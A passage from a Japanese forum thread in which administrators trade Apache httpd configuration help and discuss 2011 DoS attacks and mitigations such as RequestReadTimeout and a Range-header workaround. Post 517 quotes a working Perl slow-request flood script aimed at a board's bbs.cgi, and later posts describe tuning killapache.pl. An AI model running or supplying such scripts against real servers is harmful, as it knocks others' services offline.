2.2.17 で試してみたけど、そんなことない。
ユーザにプロンプトが出る前に一回 401 が返るけどそのログと見間違えてる?
mod_log_config.c の log_remote_user を見ても、- になるのは NULL のときだよ。

458:名無しさん@お腹いっぱい。
11/04/25 22:55:22.44
>>456
うん、マニュアルと一致しなくておかしいなぁ、と思ってた。

>>457
う~ん、なんでだろう。見間違いはないんだけよね。
でもうち以外では挙動が違うってのはうれしい情報。
もうちょっと調べてみる。


459:名無しさん@お腹いっぱい。
11/05/10 12:06:13.87
質問させてください。
apacheのプロセス番号からアクセスしているURLを調べることってできますでしょうか?
ご教示いただけると幸いです。

460:名無しさん@お腹いっぱい。
11/05/10 12:28:09.56
mod_status


461:名無しさん@お腹いっぱい。
11/05/10 23:43:44.84
strace

462: 忍法帖【Lv=4,xxxP】
11/05/17 13:18:40.00
ErrorDocument 404 /usr/home/foo/bar/404.html
のように、ローカルの絶対パスで指定ってできないんでしょうか?

環境httpdバージョン2.2

463:名無しさん@お腹いっぱい。
11/05/17 13:23:28.77
できるよ。

464:名無しさん@お腹いっぱい。
11/05/17 13:24:02.24
あ、だめか。
URLリンク(httpd.apache.org)

465:名無しさん@お腹いっぱい。
11/05/17 23:46:14.18
>>462
先に
Alias /404.html /usr/home/foo/bar/404.html
すればよくね?


466: 忍法帖【Lv=4,xxxP】
11/05/18 05:00:26.65
>>465
そうやるしかなさそうですね。ありがとございます。

467:名無しさん@お腹いっぱい。
11/05/22 23:13:08.31
>>459
モジュール内部でgetpidとrequest_recみてやればいい。

468:名無しさん@お腹いっぱい。
11/05/25 15:58:06.65
質問です。
マルチポストすみません。

以下の設定が前提です。

■ ディレクトリ構成(一部抜粋)
/var/www/hoge
/var/www/hoge/hage
/var/www/hoge/hage/hige

■ httpd.conf(一部抜粋)
DocumentRoot /var/www/html

Alias /hage /var/www/hoge/hage
<Directory "/var/www/hoge/hage">
SSLRequireSSL
ErrorDocument 403 "SSL Require -> https://"
AllowOverride All
Order allow,deny
Allow from all
</Directory>

【やりたいこと】
ディレクトリ /hage「だけ」に SSL をかけたいです。

【こまっていること】
上記設定ですと、/hage/hige にも SSL がかかってしまいます。
/hage にだけ SSL をかけることはできますでしょうか?
(そもそもの設定が間違っている可能性大ですが)
よろしくお願いいたします。

469:名無しさん@お腹いっぱい。
11/05/25 16:04:36.04
マルチポストはしないでください。

470:名無しさん@お腹いっぱい。
11/05/27 21:19:19.24
VirtualHostを複数立てて、どれのServerNameにもマッチしないときには
一番上に書いたものにマッチするそうですが、これを拒否する方法はありますか?

471:名無しさん@お腹いっぱい。
11/05/27 21:34:58.88
一番上で拒否すればええやん


472:名無しさん@お腹いっぱい。
11/05/31 11:34:45.66
/home/test/public_html/ ディレクトリと
/home/test/admin/test.cgi というファイルがあってこのtest.cgiを
実行させたいんですが、以下のようにすると client denied by server
configuration で動きません。

<VirtualHost 123.123.123.123:80>
DocumentRoot /home/test/public_html
ServerName www.test.com
ScriptAlias /ugoke/ "/home/test/admin/"
</VirtualHost>

/home/test/public_html/test.cgi に置くと問題なく動くんですが
ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか?

Apache1.3系だと上のような設定で動いているんですが・・・
今は2.0.64です。

473:名無しさん@お腹いっぱい。
11/05/31 11:42:53.97
> ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか?
そんなことはない。注意事項がマニュアルに書いてある。
マニュアルも読まない奴はサーバー管理しちゃいけないというトラップ。

474:名無しさん@お腹いっぱい。
11/05/31 12:38:12.94
ホントだ・・・ScriptAliasの箇所だけみてた。
ありがつ。

475:名無しさん@お腹いっぱい。
11/06/02 20:11:56.10
microformatsのrel-tagを使うためにはapahceで何か設定が必要ですか?
ググっても何も出てこないよ

476: 忍法帖【Lv=3,xxxP】
11/06/03 15:35:07.41
age

477:名無しさん@お腹いっぱい。
11/06/03 23:19:38.09
HTMLでそう書けばいいだけの話なのでApacheは関係してこないと思うが。

478:240
11/06/04 13:40:48.27

         ____
       /      \
     /  _ノ  ヽ、_  \
    /  o゚⌒   ⌒゚o  \   今日もまた、
    |     (__人__)    |  /usr/local/apache2/bin/apachctl start
    \     ` ⌒´     /   を打ち間違える仕事が始まったお…

479:名無しさん@お腹いっぱい。
11/06/04 21:06:20.75
>>477
HTMLで記述してもうまく動かないからサーバーの方に問題があるのかと思いまして・・・

480:名無しさん@お腹いっぱい。
11/06/05 00:33:34.28
>>479のおつむに問題があるのは確かだな

481:名無しさん@お腹いっぱい。
11/06/06 20:24:12.23
debianでapache2をインストール後間違ってapache2を削除してしまい、再度インストールしようとすると
「Sub-process /usr/bin/dpkg returned an error code」
と出てしまいます。
どうしたら再インストール出来るか教えてください。

482:名無しさん@お腹いっぱい。
11/06/06 20:28:52.63
でびあんから再インストールすれば良いよ。

483:名無しさん@お腹いっぱい。
11/06/06 20:41:33.54
>>482
1から設定しなおすのが大変なので他にないでしょうか?

484:名無しさん@お腹いっぱい。
11/06/06 21:12:18.11
あるだろうけど、適切な場所で質問しなけりゃ解は得られないだろうね。

485:名無しさん@お腹いっぱい。
11/06/06 23:00:39.10
たぶん479=481

486:名無しさん@お腹いっぱい。
11/06/08 21:01:28.15
apacheとmod_wsgiでアプリケーションを動かしています。
ログイン情報などをsessionで保存しているのですが、これを一度クリアすることってできますか?

487:名無しさん@お腹いっぱい。
11/06/10 06:07:56.31
>>481
その an error code がなんなのかわからないと答えようがないと思うが。

488:名無しさん@お腹いっぱい。
11/06/10 11:27:48.64
Debian 限定の話は Debian スレへ。

489:名無しさん@お腹いっぱい。
11/06/16 04:07:49.48
スレ違いかもしれませんがmod_Jkのフェイルオーバについて知っている方がいたら教えてください。
Webサーバ2台、APサーバ2台で構成しており、workers.propertiesは
以下のものがWebサーバ2台ともに入っています。

===
worker.list=wlb

worker.w1.type=ajp13
worker.w1.host=192.168.0.201
worker.w1.port=8009
worker.w1.redirect=w2

worker.w2.type=ajp13
worker.w2.host=192.168.0.202
worker.w2.port=8009
worker.w2.activation=disable

worker.wlb.type=lb
worker.wlb.balance_workers=w1,w2
worker.wlb.sticky_session=True
===

w1がダウンし続けた場合、mod_jkは定期的にw1にリクエストを送り、失敗したのちまたw2にフェイルオーバするという仕様になっているのでしょうか?
recovery_optionの設定も見たのですが、デフォルトが0ということでこの場合にどのような動作になるのかがわかりません。


環境は以下の通りです。
Fedora12
Apache2.2
mod_jk1.2.30

よろしくお願いいたします。

490:名無しさん@お腹いっぱい。
11/06/22 22:02:32.13
mod_rpaf がダウンロードできなくなってるんだけど、
URLリンク(stderr.net)
誰かミラー知ってる人いませんか?


491:名無しさん@お腹いっぱい。
11/06/24 18:13:00.70
見つからないね。
違ってると思うけど、mod_extract_forwarded ではダメ?・・・だよね

492:名無しさん@お腹いっぱい。
11/06/24 18:50:42.93
みっけ
fURLリンク(ftp.freebsd.org)

493:名無しさん@お腹いっぱい。
11/06/25 10:20:58.37
おー 頭いいな

494:名無しさん@お腹いっぱい。
11/06/25 10:49:30.95
検索してたら ports の Makefile が引っかかったから、
どっかにあると思ってたけど 492 さんには本当に感謝。
自分も昨日から急遽 source が必要になったから焦ってた。


495:名無しさん@お腹いっぱい。
11/07/04 18:37:48.03
mod_rewriteの設定数に上限はありますでしょうか
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-d
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f
RewriteRule ^/item/(.*)\.html /item/detail.php?id=$1 [P,QSA,NE,L]

このような設定がサイトごとに3つあり、10サイト稼働しています
サイトを増やしたところ$1が空でした
ログを見ると条件にマッチしてましたが、$1が空になってしまうのです
他のサイトを一時的に消したところ、なぜか期待通りの動きになりました
apacheのバージョンは2.2.9です
何かお分かりになりますでしょうか

496:名無しさん@お腹いっぱい。
11/07/04 19:33:55.08
mod_rewriteってのはそれ以外の手段がまったくない場合にかぎって
しかたなく使うのが許されるウンコであって、
それを通常運用としてしまうのはウンコ以下。
ウンコの限界を極めるウンコ仕事をするよりも、
ウンコを使わないで済むようにスクリプトの方を修正した方がいい。

具体的には、
AliasMatch ^/item/.*\.html /item/detail.php
として、呼ばれたURLから.*の部分を拾うようdetail.phpを書き換える。


497:名無しさん@お腹いっぱい。
11/07/09 01:11:49.14
Apache2.2を使って、ホワイトリスト型のフォワードプロキシ
(事前に指定したサイトしかアクセスできないように設定)
を作ろうとしているのですが、設定が上手くいかないです。

下記、例としてyahooおよびgoogleのみアクセスを許可して、
それ以外のサイトをアクセス拒否させる目的で設定しましたが、
一番上のアクセス拒否の設定が優先されてしまうため、
全てのサイトへのアクセスが拒否されてしまいます。

●現在の設定例(一部抜粋)
<Proxy *>
Order deny,allow
Deny from all
</Proxy>

<Proxy URLリンク(www.yahoo.co.jp)
Order allow,deny
Allow from all
</Proxy>

<Proxy URLリンク(www.google.co.jp)
Order allow,deny
Allow from all
</Proxy>

上記、あて先がyahooとgoogleのみアクセス許可して、
それ以外のサイトへのアクセスを拒否したいのですが、
Apache2.2でそれを行う方法はあるのでしょうか?
(configの記載順による優先順位の問題でしょうか?)

上記、わかる方がいれば、教えていただけると助かります。
よろしくお願いいたします。

498:名無しさん@お腹いっぱい。
11/07/23 18:08:53.11
ApacheのMPM改造したいんだけど。具体的には、バーチャルホストごとに帯域制御をしたい
参考になるサイトとかって無いかな。もしくは、やったことある人いる?

499:名無しさん@お腹いっぱい。
11/07/24 00:56:01.27
ApacheってDos攻撃対策大丈夫なの?

500:名無しさん@お腹いっぱい。
11/07/24 10:34:15.19
というと?

501:名無しさん@お腹いっぱい。
11/07/24 11:36:01.87
Apache自身にやらせたいならmod-dosdetector

502:名無しさん@お腹いっぱい。
11/07/24 12:44:00.71
ソースコード見る限り、mod_evasiveとかmod_dosdetectorとかだと弱いんだよ。
相手からのリクエストを読んでから、遮断するから。

相手が接続だけして、何もデータを送ってこないと接続数がふくれあがるはず。実験してないけど
しかも、遮断する前にスレッドなりプロセスなりを割り当てるから、リソースが無駄。

本来は、acceptした時点でIPアドレスがわかるわけだから、それを振り分ける前に遮断するべき

503:名無しさん@お腹いっぱい。
11/07/24 13:08:54.97
それはファイヤーウォールの仕事では

504:名無しさん@お腹いっぱい。
11/07/24 13:29:08.34
その手があったか。ありがとう

505:名無しさん@お腹いっぱい。
11/07/24 14:18:19.69
URLリンク(httpd.apache.org)

506:名無しさん@お腹いっぱい。
11/07/24 18:05:28.86
なんか無知な学生がレポート書きの手伝いを求めてるようなふいんきだな

507:名無しさん@お腹いっぱい。
11/07/24 20:34:50.64
>>506
そんな感じですね。

ぼんやりしたやり取りがたまらないw

508:名無しさん@お腹いっぱい。
11/07/25 00:12:09.07
うちは帯域制御はmod_cband
DoS対策はmod_security
CentOS5.x/Apache2.2.xで安定して使ってるよ


509:名無しさん@お腹いっぱい。
11/07/25 00:22:08.76
たまに刺さってmod_cbandが発狂するので、一時間に一回再起動させて運用してるよ。。
なんか帯域カウンターが戻らなくて溜まってしまう感じ

510:名無しさん@お腹いっぱい。
11/07/25 01:21:57.68
>>509
バグ報告すれば?それかソースコード自分で見れば?
モジュール単体なら、そんなに量多くないから分かるはず

>>505
URLリンク(d.hatena.ne.jp)
ここを参考mpmのソース見ると、ヘッダーを読み込んだあとにしかモジュールのフックをかけられない構造になってる。
だから、mpm改造しちゃえばできるんだけど。モジュール化の意味合いが薄まるから汚いかなって

511:名無しさん@お腹いっぱい。
11/07/25 01:24:03.92
>>505
不完全なのは知ってのことなのか。世界の誰か頑張れよ
俺がもっといいmpm作ろうかな。性能がよければ有名になれるかなwww

512:名無しさん@お腹いっぱい。
11/07/25 02:28:49.74
分離してうまく作れるんじゃないかとあれこれ試行錯誤するが
結局のところモジュール本体に改造を入れることって多いよね。。。

513:名無しさん@お腹いっぱい。
11/07/25 03:15:04.58
>>511
だったら作って有名になってみればいいじゃんw

514:509
11/07/25 10:37:52.60
ソースは追いかけて何処の変数がインクリメントしっぱなしかは確認したけど
複数プロセスで共有してる奴で、どっかで突然死するプロセスが居ればさもありなんて感じ
発生頻度も週一くらいで、何台かで回してるサービスだし面倒


515:名無しさん@お腹いっぱい。
11/07/25 11:56:14.21
2.4 に mod_ratelimit ってのが入るので、先取りしてバージョン上げちゃえ。


516:名無しさん@お腹いっぱい。
11/08/04 07:37:37.77
449 忍法帖【Lv=40,xxxPT】 ◆8huU.uGZBA sage 2011/08/03(水) 15:02:01.85 ID:49.133.48.168 0
サーバへにリクエストが来た時、リクエストを受け取るまでhttpdは待っているわけだ
しかしcontentslength分だけ受け取りたいけど待てど暮らせど送ってこないから
httpd.confのtimeoutするまでそのhttpdプロセスがブロックされるんだな
そしてそれがたーくさんたまる、売り切れまで溜まる
売り切れたらそれ以降のhttpの要求は受け付けなくなる

攻撃がやんだらブロックされているhttpdは順次timeoutで開放され
だんだんいつもの状態に近づく

こうなんじゃないかな?

456 ◆IOT1IIO1ILUU-さる♪ sage 2011/08/03(水) 15:06:18.97 ID:219.106.108.87 0
>>449
大体はそんな感じです。
少し違うのは、Content-Lengthは関係ありません。
中途半端なHTTPリクエストであってもApacheが律儀にTCPのタイムアウトまでリソースを確保して待ってしまうのが原因なので、
それこそTCPで何か少しでもデータを送ってやれば、HTTPリクエストとして完全に破綻していてもApacheは落ちます。
なのでHTTPのヘッダに着目して対策するのは無理です。

517:名無しさん@お腹いっぱい。
11/08/04 07:39:45.57
こんな感じなんだけどどうやったら対策できる?
攻撃元のスクリプトは以下

433 名無しさん@お腹いっぱい。 sage 2011/08/03(水) 14:51:01.84 ID:81.94.203.180 0
スクリプト自体はマルチスレッドでBBS.CGIを叩くだけなんだよな
こんな感じで

my $ref = sub{
while(){
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname( 'tcp'));
connect(SOCK, sockaddr_in("80", $ipaddr));
select(SOCK);
$|=1;
select(STDOUT);

print SOCK "POST /test/bbs.cgi HTTP/1.1\r\n";
print SOCK "Accept: */*\r\n";
print SOCK "Referer: URLリンク($sv)" . "/news/\r\n";
print SOCK "Accept-Language: ja,en;q=0.5\r\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\r\n";
print SOCK "Accept-Encoding: gzip, deflate\r\n";
print SOCK "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\r\n";
print SOCK "Host: $sv\r\n";
print SOCK "Content-Length: 1\r\n";
print SOCK "Connection: Keep-Alive\r\n";
print SOCK "\r\n";
close(SOCK);

threads->yield();
}
};

518:名無しさん@お腹いっぱい。
11/08/04 10:17:16.26
slowloris 対策なら RequestReadTimeout で。


519:名無しさん@お腹いっぱい。
11/08/04 10:38:02.85
>>518
ありがとう

520:名無しさん@お腹いっぱい。
11/08/07 14:40:43.49
ブラウザでリクエストヘッダーに
Keep-Aliveの時間を指定した場合、どういう時間を指し示すのでしょうか?
Wikipediaを見ていてふと疑問に思いました。

Keepalive time is the duration between two keepalive transmissions in idle condition. TCP keepalive period is required to be configurable and by default is set to no less than 2 hours.
Keepalive interval is the duration between two successive keepalive retransmissions, if acknowledgement to the previous keepalive transmission is not received.

URLリンク(en.wikipedia.org)

521:名無しさん@お腹いっぱい。
11/08/07 15:23:57.31
TCP keepaliveの説明を引用してくるバカがおる

522:名無しさん@お腹いっぱい。
11/08/07 17:14:40.13
フイタw

523:名無しさん@お腹いっぱい。
11/08/09 04:00:06.70
wgetで直アクセスすると404 Not Foundを返して来て、
telnetでアクセス(HEAD /some/foo/hoge.jpg HTTP/1.0)しても404を返してくるサーバがあります。
それなのに、chromeでアクセスすると画像が表示されます。

これってどういう設定なのでしょうか?
telnetやwgetでchromeと同じ結果を得るためには、どうアクセスするべきなのでしょうか?

524:509
11/08/09 10:40:40.07
UAとかホスト名指定とかじゃあ?

525:名無しさん@お腹いっぱい。
11/08/10 03:24:02.30
Referer の制限かなあ。
Chrome で見えるって言うのは、画像の URI を直接指定して?
こちらの紳士達が詳しいかも↓
スレリンク(unix板)l50

526:名無しさん@お腹いっぱい。
11/08/10 22:09:42.74
ホスト名やリファラによる制限はブラウザと関係ないし
ユーザエージェント制限の可能性があるけどその場合は404じゃんくて403だよね

527:名無しさん@お腹いっぱい。
11/08/10 23:46:51.84
何を返してくるかは相手次第だろうに403と決めてかかるとかw

528:名無しさん@お腹いっぱい。
11/08/11 00:04:53.56
403を404エラーとして返すサーバならそうだろうけど、わざわざそうする理由があるサーバということだよね?

529:名無しさん@お腹いっぱい。
11/08/11 10:41:31.12
ErrorDocumentを指定していてその先で404にすげ替えるとか。

530:名無しさん@お腹いっぱい。
11/08/11 12:15:38.68
>>528
軽い気持ちで404返してるかも知れないのにお前は何を言ってるんだ?

531:名無しさん@お腹いっぱい。
11/08/11 13:36:22.24
528は恥ずかしくてつい恥の上塗りでしょ


532:名無しさん@お腹いっぱい。
11/08/13 04:50:07.44
fc2とかリファラで404返してくるじゃん

533:名無しさん@お腹いっぱい。
11/08/18 10:42:17.44
違うドメイン名へのアクセスをエラーにしたいんだけど
どう設定したらいいかな。

chinkoサーバに URLリンク(unko) というアクセスがあったとき
200でなく404とか適切なエラーを返したい

534:名無しさん@お腹いっぱい。
11/08/18 10:43:51.16
VirtualHost

535:名無しさん@お腹いっぱい。
11/08/18 18:25:43.83
Hostヘッダーを見てはじけばいい

536:名無しさん@お腹いっぱい。
11/08/25 21:34:02.90
CVE-2011-3192
Range header DoS vulnerability Apache HTTPD 1.3/2.x


1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

対策してね。

537:名無しさん@お腹いっぱい。
11/08/25 22:01:49.96
【ニュー速ハッカー部】Apacheの脆弱性を突く「Apache Killer」 お前らのサーバの危険が危ない
スレリンク(news板)

538:名無しさん@お腹いっぱい。
11/08/25 23:31:09.77
赤帽パッチまだー( ゚д゚)
URLリンク(bugzilla.redhat.com)

539:名無しさん@お腹いっぱい。
11/08/26 10:04:21.25
お前らどころか2chが盛大に落とされたわけだが、他のサイトでは対策してあんのかな

540:名無しさん@お腹いっぱい。
11/08/26 11:57:53.46
2chが盛大に落ちたんだから他の奴等はこれはヤバいwと気づいて対策するだろうよ。
問題は2chが落ちた原因が ApacheKillerだと認識されてるかどうかだが。

2ch来てない奴には通用しないかも。ニュース系サイトでの取扱い鈍いし。

541:名無しさん@お腹いっぱい。
11/08/26 21:29:06.82
>>536
それ対策なってねーぞw

542:名無しさん@お腹いっぱい。
11/08/26 22:36:22.12
Apache HTTPD Security ADVISORY
==============================
UPDATE 2

なんてのを用意中ぽいな
workaroundも修正されとるでぇ
URLリンク(mail-archives.apache.org)

543:名無しさん@お腹いっぱい。
11/08/26 23:00:52.14
既にannounceに流れてた
URLリンク(mail-archives.apache.org)

ということで
>>536
はネタが古い

544:名無しさん@お腹いっぱい。
11/08/26 23:50:02.78
WAは検証して使えなかったから、ソース待ち
お前らちゃんと検証しろよな

545:名無しさん@お腹いっぱい。
11/08/27 09:17:11.02
>>543
あんまし困らないけどenv=bad-req-rangeの定義がないような気がする・・・。
SetEnvIf漏れ?

546:名無しさん@お腹いっぱい。
11/08/27 09:59:14.61
httpd-devはヲチっとけ

547:名無しさん@お腹いっぱい。
11/08/29 18:31:37.90
LoadModuleにある、mod_authxxxxxっていっぱいあるけど、
「使ってないぞコレ」と思ったらコメントアウトしてOK?

なんか気を付けることがあったらおしえてください。

548:名無しさん@お腹いっぱい。
11/08/29 18:50:36.98
まずはドキュメント読みなよ。

549:名無しさん@お腹いっぱい。
11/08/29 19:00:03.08
>548
一応Apacheのところを読んではいるんですが、
「××する機能」とはあるんですが、止めたら何が問題か?は書いてないですよね?

ノウハウっぽいところがあるのかな?と。

550:名無しさん@お腹いっぱい。
11/08/29 19:29:15.16
「××する機能」がいらないなら止めていいんじゃね。

551:名無しさん@お腹いっぱい。
11/08/29 19:43:26.29
全部コメントアウトして、動くようになるまで追加する。

552:名無しさん@お腹いっぱい。
11/08/29 19:46:34.21
モジュールのページを見ると
そのモジュールが提供するディレクティブ一覧が載ってる。
そのディレクティブを使ってなければたいていいらない。

553:名無しさん@お腹いっぱい。
11/08/29 21:15:45.17
>550-552
大体そんな方針で良いみたいですね

ある程度最初からonにしてあるのは利便性のタメかな?

554:名無しさん@お腹いっぱい。
11/08/29 23:02:41.02
ある程度というより、configure時にsharedで有効にしたものは全部onになってるぞ

555:名無しさん@お腹いっぱい。
11/08/30 11:10:26.12
apacheを使い始めたばかりの者ですが、よく分からないことがあります。

apacheのドキュメントルート直下に/cgi-bin/という名前のフォルダを作ると、
Forbiddenとなってしまい、それ以下のファイルを参照することが出来なくなってしまいます。
直下に/cgi-bin/を配置するのではなく、/test/cgi-bin/というようにワンクッション置けば参照できるようになります。
これは正常な動作なのでしょうか?
また、これが正常な動作である場合、ドキュメントルート直下に/cgi-bin/というフォルダを置いても
Forbiddenにならないようにするにはどのように設定を変更すればよいのでしょうか?

教えていただきたいです。

556:名無しさん@お腹いっぱい。
11/08/30 11:20:54.28
>>555
っ ScriptAlias

557:555
11/08/30 12:28:42.47
>>556
ありがとうございます。
つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
それでScriptAliasの設定が優先されるので、自分で作成した/cgi-bin/はForbiddenになってしまうと。

あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
cgi自体をダウンロードされたり表示されないようにするためだと記してあるサイトが多いようですが、
ScriptAliasに置かなくてもcgiにアクセスしたら、結局はプログラムが実行された後の結果しか与えられないと考えていたのですが。
ScriptAliasで設定したディレクトリ以外に置かれたcgiというのは、その中身が簡単にみられてしまったりするのでしょうか?

558:名無しさん@お腹いっぱい。
11/08/30 13:28:23.86
>>557
> つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
ScriptAlias の指定が優先されてドキュメントルートの方の /cgi-bin/ は参照されない。

> あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
一ヶ所に集めておくと管理しやすい。
あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

559:555
11/08/30 14:09:15.85
>>558
解説ありがとうございます。

>あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

これはつまりセキュリティの事を考慮すると、cgiはScriptAliasで設定したディレクトリに置いた方がよいということですよね。

この質問とは別のことになりますが、例えばページの管理者だけが使用することを目的としたcgiを作成した場合、
ドキュメントルート下にhtaccessの設定でBasic認証を有効にしたディレクトリにそのcgiを置くよりも、
ScriptAliasで設定したディレクトリにそのcgiを置いた方がセキュリティ面では良いということになるのでしょうか?

560:名無しさん@お腹いっぱい。
11/08/30 14:21:51.67
>>559
管理しきれるならどこに置いてもいいんじゃね。

あと、自分と同じディレクトリにデータファイルを作るようなプログラムがあった場合に
ScriptAlias 以下ならそのファイルを覗かれることがない、っていう利点もあるにはある。
副次的な効果だけど。
そんなプログラム作る方が悪いんだけど。

561:555
11/08/30 14:34:43.13
>>560

とりあえず、初心者なのでScriptAliasで設定したディレクトリにcgiを集めることにしてみます。

お答えくださってありがとうございました。

562:名無しさん@お腹いっぱい。
11/08/30 14:46:50.14
URLリンク(httpd.apache.org)

563:名無しさん@お腹いっぱい。
11/08/31 10:38:02.43
2.2.20


564:名無しさん@お腹いっぱい。
11/08/31 11:02:44.56
早速上げたった。
テストは面倒だからしてない(・∀・)y‐┛~~

565:名無しさん@お腹いっぱい。
11/08/31 14:52:22.61
1.3系使ってる人はどうするの?
まだまだ沢山いると思うんだけど...

566:名無しさん@お腹いっぱい。
11/08/31 15:02:26.97
いいかげん 2.x に乗り換えれ。

567:名無しさん@お腹いっぱい。
11/08/31 15:06:53.44
自分のサーバーなら2.2系使ってるんだけどね...
仕事先のだとなかなか...

568:名無しさん@お腹いっぱい。
11/08/31 15:07:58.37
1.3系のパッチの予定はないのかな?

569:名無しさん@お腹いっぱい。
11/08/31 17:54:52.56
ないよ。

570:名無しさん@お腹いっぱい。
11/08/31 23:31:26.50
赤帽バッチまだー
>>538

571:名無しさん@お腹いっぱい。
11/09/01 03:47:35.52
2.2.20速いぞ

572:名無しさん@お腹いっぱい。
11/09/01 10:45:44.80
>>570
来たよ。
URLリンク(rhn.redhat.com)

573:名無しさん@お腹いっぱい。
11/09/01 11:18:40.39
2.0系のパッチの予定はないのかな?

574:名無しさん@お腹いっぱい。
11/09/01 11:40:51.42
自分でバックポートしれ そして配布しれ

575:名無しさん@お腹いっぱい。
11/09/01 12:11:51.87
>>573
RHEL4.xのパッチをパクればOK

576:名無しさん@お腹いっぱい。
11/09/01 12:29:35.32
2.0.x は出す
1.3.x は出さないと言ってた気がする

577:名無しさん@お腹いっぱい。
11/09/01 12:39:32.05
早い対応、めでたし。
今回の脆弱性で実際に攻撃を受けたってサイトはあるの?

578:名無しさん@お腹いっぱい。
11/09/01 13:12:44.86
>>577
2ch とか?

579:名無しさん@お腹いっぱい。
11/09/01 13:15:49.58
>>574>>575
非公式な対応はいろいろあるけど、
公式に出ないのかな、と思って。

580:名無しさん@お腹いっぱい。
11/09/01 14:41:38.01
URLリンク(ftp.redhat.com)

581:名無しさん@お腹いっぱい。
11/09/01 14:43:16.08
>>580
とつぜんどうしたの。

582:名無しさん@お腹いっぱい。
11/09/01 14:48:35.43
ウフフ

583:名無しさん@お腹いっぱい。
11/09/01 18:50:37.25
Apache Killerの件で
落としてみて報告してくれと無茶ぶりされて、
必死こいて頑張っていますが、
killapache.pl を使って、
1.3.xでは落ちません。
2.2.xでは落ちました。
変な話ですが、1.3.xで落とせた方はいらっしゃいますか?


584:名無しさん@お腹いっぱい。
11/09/01 20:19:33.78
つまり1.3最強という事ですね。

585:名無しさん@お腹いっぱい。
11/09/01 20:26:28.53
1.3はinetdモード使えるから今でも重宝してる

586:名無しさん@お腹いっぱい。
11/09/01 20:35:48.51
>>585
なんでinetdモード使ってるの?

587:名無しさん@お腹いっぱい。
11/09/01 20:38:22.72
ちゃんとプロセス数増やしてメモリ潰さないと止まらないっしょ

588:名無しさん@お腹いっぱい。
11/09/01 21:50:55.78
>>586
TCP Wrapper が使いたいとか?

589:名無しさん@お腹いっぱい。
11/09/01 22:15:07.02
>>583
ここが参考になるかも
URLリンク(blog.tokumaru.org)

590:名無しさん@お腹いっぱい。
11/09/01 22:40:19.55
583です。
MaxClientsを下げて10にしましたが、ビクともしません。
そもそもkillapache.plの
28行目 for ($k=0;$k<1300;$k++) {

for ($k=5;$k<1300;$k++) {
としないと
206 Partial Content
が返りませんでした。200が返りました。
2.2.xでは、何もしなくても206が返りました。
再現方法が違うのでしょうか?


591:名無しさん@お腹いっぱい。
11/09/01 22:45:57.52
>>590
URLリンク(people.apache.org)

592:名無しさん@お腹いっぱい。
11/09/01 23:09:15.40
>>591
583です。

そんな今さら・・・

Apache 1.3 is NOT vulnerable.
えっ!?

UPDATE2までしか見ていませんでした。
ありがとうございました!

593:名無しさん@お腹いっぱい。
11/09/01 23:40:13.17
わかりました。apache_1.3.42 に戻します。

594:名無しさん@お腹いっぱい。
11/09/02 01:22:26.29
1.3系試してないねぇ
URLリンク(www.jpcert.or.jp)

595:名無しさん@お腹いっぱい。
11/09/02 08:36:48.74
え?1.3系は大丈夫だったの?

596:名無しさん@お腹いっぱい。
11/09/03 12:23:58.91
URLリンク(huge.shit.com) -> 200 OK
URLリンク(huge.shit.com) -> 404 Not Found
URLリンク(<)<)上記ドメインのIP>/test.php?param=xxx -> 200 OK

Virtualhostへのアクセスで存在するファイルにGETパラメータを渡すと404になる。
こんな現象に悩まされてるんだけど、これなんで?誰か教えて!

597:名無しさん@お腹いっぱい。
11/09/03 12:39:44.97
ログ読んでみたら。

598:名無しさん@お腹いっぱい。
11/09/03 12:45:11.61
ログは File is not found が並んでるだけなんだよね。
ていうか、パラメータ渡すと not found になる設定ってあるのかな。
昨日まで正常だったのに、いきなりこの現象が発生してわけわからんのです。

599:名無しさん@お腹いっぱい。
11/09/03 13:44:17.55
何も変更してないならrestartしてみたら?

600:名無しさん@お腹いっぱい。
11/09/03 13:48:55.99
restartはしたんすよ。変わらずです。
おれ以外にも管理者はいるから誰かが
何かを書き換えた可能性はなくはないんだよね。
?でパラメータ渡すと別ファイルとして認識されちゃうってことだよね多分これ。

601:名無しさん@お腹いっぱい。
11/09/03 14:14:14.82
書き換えた人に聞いた方が早くない?
confの日付で実際更新されてるか分かるだろうし。

602:名無しさん@お腹いっぱい。
11/09/03 14:21:53.08
>>596

Rewrite使ってる?
Apache Killerの件で設定変えたとか。

603:名無しさん@お腹いっぱい。
11/09/03 15:36:13.73
>>602
Rewriteは、してないね。
killapache対策はしたけど、数日前なので、タイミングは合致しないなー。

604:名無しさん@お腹いっぱい。
11/09/03 15:45:48.19
POSTした場合はどうなりますか?

605:名無しさん@お腹いっぱい。
11/09/03 16:34:37.48
普通設定いじる前にバックアップとらない?
diffすればいいんじゃない?

606:名無しさん@お腹いっぱい。
11/09/03 16:57:16.34
>> 601
誰が何を変更したのかがわかる状況ではないんだよね。confの更新日はkillapache対策の時だね。昨日じゃない。
ためしにRange周りの設定をオフってみたけど関係ないみたい。
>> 604
FirefoxのHackbarってアドオン使ってPOSTしてみた限りでは問題なかべおん。
てかさ、
/js/jquery.js
だとアクセスできて
/js/jqueyr.js?test
でNot Foundになるってどおゆうことなんだろう。んなことある?

607:名無しさん@お腹いっぱい。
11/09/03 18:53:08.15
>>606

違うブラウザではどんな?同じ動作?

608:名無しさん@お腹いっぱい。
11/09/03 19:19:20.79
>>606
